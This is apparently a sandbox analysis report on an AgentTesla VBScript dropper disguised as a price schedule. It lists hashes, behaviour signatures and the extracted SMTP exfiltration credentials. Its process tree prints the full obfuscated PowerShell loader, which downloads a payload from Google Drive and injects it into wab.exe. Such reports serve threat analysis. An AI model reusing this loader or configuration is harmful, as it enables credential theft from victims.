Analysis
-
max time kernel
149s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
21/05/2024, 03:42
Static task
static1
Behavioral task
behavioral1
Sample
RFQINL21052024_PRICE SCHEDULE.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
RFQINL21052024_PRICE SCHEDULE.vbs
Resource
win10v2004-20240426-en
General
-
Target
RFQINL21052024_PRICE SCHEDULE.vbs
-
Size
5KB
-
MD5
ebdb23546bd0e7f4aee2a75909460482
-
SHA1
5e11c38b784b7337fc2cc6ab7100c0240476c7a2
-
SHA256
b1f6ace20017902dbd10246ef780c162d7efa2c6eaa26934b45a784223c72293
-
SHA512
b16b6573af01d2bd2314c5de1d6dd6e4cbe8080ae0b72fe9180c95f27034e69cef1b1e078162ce7783195f37050d72c9e27940b73203586cc3e1908841faf234
-
SSDEEP
96:QN7IU07Fzr15ZV3J0j9b0xF6Q/0Gb1plVB4CXcZQfp:QFO7hB/pJ0xb2Fn/hpLCCXcKfp
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.connectdots.my - Port:
587 - Username:
[email protected] - Password:
Colony5157! - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2620 powershell.exe 7 2620 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 drive.google.com 5 drive.google.com 9 drive.google.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 api.ipify.org 14 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2360 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2384 powershell.exe 2360 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2384 set thread context of 2360 2384 powershell.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2620 powershell.exe 2384 powershell.exe 2384 powershell.exe 2360 wab.exe 2360 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2384 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2620 powershell.exe Token: SeDebugPrivilege 2384 powershell.exe Token: SeDebugPrivilege 2360 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2188 wrote to memory of 2620 2188 WScript.exe 29 PID 2188 wrote to memory of 2620 2188 WScript.exe 29 PID 2188 wrote to memory of 2620 2188 WScript.exe 29 PID 2620 wrote to memory of 2408 2620 powershell.exe 31 PID 2620 wrote to memory of 2408 2620 powershell.exe 31 PID 2620 wrote to memory of 2408 2620 powershell.exe 31 PID 2620 wrote to memory of 2384 2620 powershell.exe 32 PID 2620 wrote to memory of 2384 2620 powershell.exe 32 PID 2620 wrote to memory of 2384 2620 powershell.exe 32 PID 2620 wrote to memory of 2384 2620 powershell.exe 32 PID 2384 wrote to memory of 2876 2384 powershell.exe 33 PID 2384 wrote to memory of 2876 2384 powershell.exe 33 PID 2384 wrote to memory of 2876 2384 powershell.exe 33 PID 2384 wrote to memory of 2876 2384 powershell.exe 33 PID 2384 wrote to memory of 2360 2384 powershell.exe 34 PID 2384 wrote to memory of 2360 2384 powershell.exe 34 PID 2384 wrote to memory of 2360 2384 powershell.exe 34 PID 2384 wrote to memory of 2360 2384 powershell.exe 34 PID 2384 wrote to memory of 2360 2384 powershell.exe 34 PID 2384 wrote to memory of 2360 2384 powershell.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;$Cryptovalency='Sub';$Cryptovalency+='strin';$Cryptovalency+='g';Function Orthopsychiatric($Vagtskrmenes){$Niedersachsen=$Vagtskrmenes.Length-$Respondency;For($Propping=1;$Propping -lt $Niedersachsen;$Propping+=2){$militrmissioner+=$Vagtskrmenes.$Cryptovalency.Invoke( $Propping, $Respondency);}$militrmissioner;}function Anthoxanthin($vindruernes){& ($Elev) ($vindruernes);}$Stabstamburers=Orthopsychiatric ' MIoUz i lClLa,/ 5T.,0, ,(KW i.nEd,o,wFs iNGTB N1T0,.U0 ; UW.i nK6D4.;H x.6 4 ;L r,v.: 1C2 1O.,0 )I GTe c.k o,/.2E0 1,0S0T1L0.1 .FBi,r eYfNo,x /.1 2 1 .A0m ';$tickless=Orthopsychiatric 'pUEste r -TAUg,eSnPt, ';$Lance=Orthopsychiatric 'FhRtTt p ss:I/F/ddkrFi vKeA.BgNo.omg l,eE. c,o,m,/OuBcC? ePx peoSr tB=,dSoBwRnzl oMa,d &Ci dB=V1.wAsTY VTlAWBzBj p sFR gRT,8.NR2Gz N P K,5 jTI.fUMAF,1BN o _,d N. ';$Weetbird=Orthopsychiatric ',>, ';$Elev=Orthopsychiatric '.i eDxB ';$Ultra='Termine';$Galopade = Orthopsychiatric 'Pe c h o N%WaFpWp dma,tEaT%S\DM,a c c oB.aC.otf, & & e cSh o .t ';Anthoxanthin (Orthopsychiatric ' $,gClLoSbHaPl.: B lNe,g nQb eItPs =d( c,mCdA /ScG D$CG aBl o p amd e.)H ');Anthoxanthin (Orthopsychiatric 'K$ g lToCbTaGlY:OL o nTg hMaSi rR=.$ULsa n c.e,.IsFpDl.ift (T$SW e eBt,bSiGr dR)U ');$Lance=$Longhair[0];$folkemorderiske= (Orthopsychiatric 'o$ g l oSbFa lB:MACn t.i oWcFhVu.sT=FN eDw -.O b j e,c t PS,yTsPt,e,mC.,N,e t .DW eOb,CGlAiAeDnPt');$folkemorderiske+=$Blegnbets[1];Anthoxanthin ($folkemorderiske);Anthoxanthin (Orthopsychiatric ' $gA,nat,i o.cShhuPsS. HFeBaAdNeKr s [T$ t i cCk l e s sK],=k$ SIt aGbSsKtWaTm b.uSr.eOrCsB ');$Gigantesque=Orthopsychiatric ' $ Abn t iHoScVh u s..sD oTw.n.lPo a dHFSiDl eD( $,LTa nHcAe.,I$AFSa.m e l e,sSsDnseCs ss)H ';$Famelessness=$Blegnbets[0];Anthoxanthin (Orthopsychiatric ' $OgTl oRbIaPlO:.CAaUc oSePpVi.sVt i.cG=.(TTAeTs.t,-tPMa,tLhF I$ F a m ePlGe s s n e s s,)B ');while (!$Cacoepistic) {Anthoxanthin (Orthopsychiatric 'F$PgTlToFbOa,l :,S u l pShboNz iSn.cMaAt,e,= $Gt,r uHeL ') ;Anthoxanthin $Gigantesque;Anthoxanthin (Orthopsychiatric ' SSt aUr tp-,S lPe eupC ,4 ');Anthoxanthin (Orthopsychiatric 'R$EgIl oTb a,lF: C.aTclo e,p i.sBtAiRcB=A(,T,eCsAtI- PQaLtIhR $KF aumCe,l eCsMs,n.e s s,), ') ;Anthoxanthin (Orthopsychiatric ' $,g.l.oPbIa l,:CVaaKl.eRt.a.g eR= $ g.l,oUb aCl.:sSGmLaHd.d e,r k a,s sUeE+C+A% $,L.o nNg.h aBi r .WcPoOu nPtT ') ;$Lance=$Longhair[$Valetage];}$Symbiotism=358810;$Programmeringsmuligheder=27231;Anthoxanthin (Orthopsychiatric '.$.gKl o bSa l.:SO,m,s.t nKi,nLgGsKu,dSvHivk.l i nKg,e.n ,= G,e.tS-,C.o nKt eGnKt O$ F a,mKeTlDe sUsSnreas sM ');Anthoxanthin (Orthopsychiatric 'H$SgKl oAbUaSl : PUhUoTtHo l,yLt e. P=, H[ISAySsStHeFm .CCpoin vMe,rKt.]P:,:DFDr oSmEBFaBs.eP6B4 S,tPrCi,n.gu( $LOAmSs tMnuiUn g,sSuQdPvBi.k lDiBn,g e nG), ');Anthoxanthin (Orthopsychiatric ',$TgRl o b a lS: USdRrOyPdAdCeglKsGeTrTsF2N1F6S I=. [.S yMs,tRebmE.BT.eGxotF.REBn cUo.dsion g ] :.:MAFSUCCIGI..KGSe,tDSEtMr iPn g ( $ PghWo,t o lKyDtFe ). ');Anthoxanthin (Orthopsychiatric '.$,gPl oJb a lL:Pa p.p lGe dFrRo,n e = $.U.d rQy dBd eplLsReTrSs.2H1 6B. sTu b s tSrBiSn.gU(A$BS,yFmUbSiDo tMi,sBmS, $UPHrSoRg,r a.mKm e.r inn,g.sLm uPlSiTg h eNdUedr,) ');Anthoxanthin $appledrone;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"3⤵PID:2408
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;$Cryptovalency='Sub';$Cryptovalency+='strin';$Cryptovalency+='g';Function Orthopsychiatric($Vagtskrmenes){$Niedersachsen=$Vagtskrmenes.Length-$Respondency;For($Propping=1;$Propping -lt $Niedersachsen;$Propping+=2){$militrmissioner+=$Vagtskrmenes.$Cryptovalency.Invoke( $Propping, $Respondency);}$militrmissioner;}function Anthoxanthin($vindruernes){& ($Elev) ($vindruernes);}$Stabstamburers=Orthopsychiatric ' MIoUz i lClLa,/ 5T.,0, ,(KW i.nEd,o,wFs iNGTB N1T0,.U0 ; UW.i nK6D4.;H x.6 4 ;L r,v.: 1C2 1O.,0 )I GTe c.k o,/.2E0 1,0S0T1L0.1 .FBi,r eYfNo,x /.1 2 1 .A0m ';$tickless=Orthopsychiatric 'pUEste r -TAUg,eSnPt, ';$Lance=Orthopsychiatric 'FhRtTt p ss:I/F/ddkrFi vKeA.BgNo.omg l,eE. c,o,m,/OuBcC? ePx peoSr tB=,dSoBwRnzl oMa,d &Ci dB=V1.wAsTY VTlAWBzBj p sFR gRT,8.NR2Gz N P K,5 jTI.fUMAF,1BN o _,d N. ';$Weetbird=Orthopsychiatric ',>, ';$Elev=Orthopsychiatric '.i eDxB ';$Ultra='Termine';$Galopade = Orthopsychiatric 'Pe c h o N%WaFpWp dma,tEaT%S\DM,a c c oB.aC.otf, & & e cSh o .t ';Anthoxanthin (Orthopsychiatric ' $,gClLoSbHaPl.: B lNe,g nQb eItPs =d( c,mCdA /ScG D$CG aBl o p amd e.)H ');Anthoxanthin (Orthopsychiatric 'K$ g lToCbTaGlY:OL o nTg hMaSi rR=.$ULsa n c.e,.IsFpDl.ift (T$SW e eBt,bSiGr dR)U ');$Lance=$Longhair[0];$folkemorderiske= (Orthopsychiatric 'o$ g l oSbFa lB:MACn t.i oWcFhVu.sT=FN eDw -.O b j e,c t PS,yTsPt,e,mC.,N,e t .DW eOb,CGlAiAeDnPt');$folkemorderiske+=$Blegnbets[1];Anthoxanthin ($folkemorderiske);Anthoxanthin (Orthopsychiatric ' $gA,nat,i o.cShhuPsS. HFeBaAdNeKr s [T$ t i cCk l e s sK],=k$ SIt aGbSsKtWaTm b.uSr.eOrCsB ');$Gigantesque=Orthopsychiatric ' $ Abn t iHoScVh u s..sD oTw.n.lPo a dHFSiDl eD( $,LTa nHcAe.,I$AFSa.m e l e,sSsDnseCs ss)H ';$Famelessness=$Blegnbets[0];Anthoxanthin (Orthopsychiatric ' $OgTl oRbIaPlO:.CAaUc oSePpVi.sVt i.cG=.(TTAeTs.t,-tPMa,tLhF I$ F a m ePlGe s s n e s s,)B ');while (!$Cacoepistic) {Anthoxanthin (Orthopsychiatric 'F$PgTlToFbOa,l :,S u l pShboNz iSn.cMaAt,e,= $Gt,r uHeL ') ;Anthoxanthin $Gigantesque;Anthoxanthin (Orthopsychiatric ' SSt aUr tp-,S lPe eupC ,4 ');Anthoxanthin (Orthopsychiatric 'R$EgIl oTb a,lF: C.aTclo e,p i.sBtAiRcB=A(,T,eCsAtI- PQaLtIhR $KF aumCe,l eCsMs,n.e s s,), ') ;Anthoxanthin (Orthopsychiatric ' $,g.l.oPbIa l,:CVaaKl.eRt.a.g eR= $ g.l,oUb aCl.:sSGmLaHd.d e,r k a,s sUeE+C+A% $,L.o nNg.h aBi r .WcPoOu nPtT ') ;$Lance=$Longhair[$Valetage];}$Symbiotism=358810;$Programmeringsmuligheder=27231;Anthoxanthin (Orthopsychiatric '.$.gKl o bSa l.:SO,m,s.t nKi,nLgGsKu,dSvHivk.l i nKg,e.n ,= G,e.tS-,C.o nKt eGnKt O$ F a,mKeTlDe sUsSnreas sM ');Anthoxanthin (Orthopsychiatric 'H$SgKl oAbUaSl : PUhUoTtHo l,yLt e. P=, H[ISAySsStHeFm .CCpoin vMe,rKt.]P:,:DFDr oSmEBFaBs.eP6B4 S,tPrCi,n.gu( $LOAmSs tMnuiUn g,sSuQdPvBi.k lDiBn,g e nG), ');Anthoxanthin (Orthopsychiatric ',$TgRl o b a lS: USdRrOyPdAdCeglKsGeTrTsF2N1F6S I=. [.S yMs,tRebmE.BT.eGxotF.REBn cUo.dsion g ] :.:MAFSUCCIGI..KGSe,tDSEtMr iPn g ( $ PghWo,t o lKyDtFe ). ');Anthoxanthin (Orthopsychiatric '.$,gPl oJb a lL:Pa p.p lGe dFrRo,n e = $.U.d rQy dBd eplLsReTrSs.2H1 6B. sTu b s tSrBiSn.gU(A$BS,yFmUbSiDo tMi,sBmS, $UPHrSoRg,r a.mKm e.r inn,g.sLm uPlSiTg h eNdUedr,) ');Anthoxanthin $appledrone;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"4⤵PID:2876
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
502KB
MD57f40a091f1c133333e814a35fe64d807
SHA18d278db73f3e270f33b743f358a9cfa1e3bdbe37
SHA2565454057fe5e349e2139169937a8bb6d34b4e6e6ba83bccebaa4e701f3ccc3edb
SHA512d930b6c0ca34da1f9cad04b5b65218bc98dde299c85627c659ae5a2f25c5321f353f1b826ee4e8bebfa32a2b7184c7a5c69c9e6a4fff42e9232f8604d511dfcb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5P9UP6GMQYW2S58RUTY4.temp
Filesize7KB
MD5da50a696b90bbeba959d82bd3d9aeebf
SHA18a7c678eb0ca20d28afa61bb09dd12b1fe15e676
SHA2568cf890db7e1d04b922e2936a358677408407695cdba5f3d30d649888e5279b3a
SHA512f3d52818a1e2e822c088633dbde0d5d27d4c80e109cc773dc371e1210f5f6f73f1259b81d17c34beb1b01a18d743a82824ff23162df60844caf37966a8c745ea